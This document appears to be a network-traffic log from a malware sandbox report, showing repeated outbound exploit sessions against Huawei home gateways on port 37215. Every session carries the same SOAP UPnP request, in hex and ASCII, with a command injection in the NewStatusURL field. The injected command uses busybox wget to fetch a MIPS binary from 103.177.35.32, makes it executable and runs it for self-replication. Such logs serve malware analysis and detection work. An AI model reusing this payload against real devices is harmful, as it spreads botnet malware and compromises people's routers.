                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1501192.168.2.2354626197.168.181.5537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543481112 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1502192.168.2.2334340157.127.253.10037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543492079 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1503192.168.2.2356402197.234.222.11337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543500900 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1504192.168.2.2352904157.174.83.12037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543704033 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1505192.168.2.2340880197.81.154.8937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543714046 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1506192.168.2.2340320105.111.25.21437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543731928 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1507192.168.2.2333476157.181.127.1237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.543828964 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1508192.168.2.234174841.164.208.15037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.544236898 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1509192.168.2.2353016197.159.67.17737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.544244051 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1510192.168.2.2355686218.64.64.5537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.544250965 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
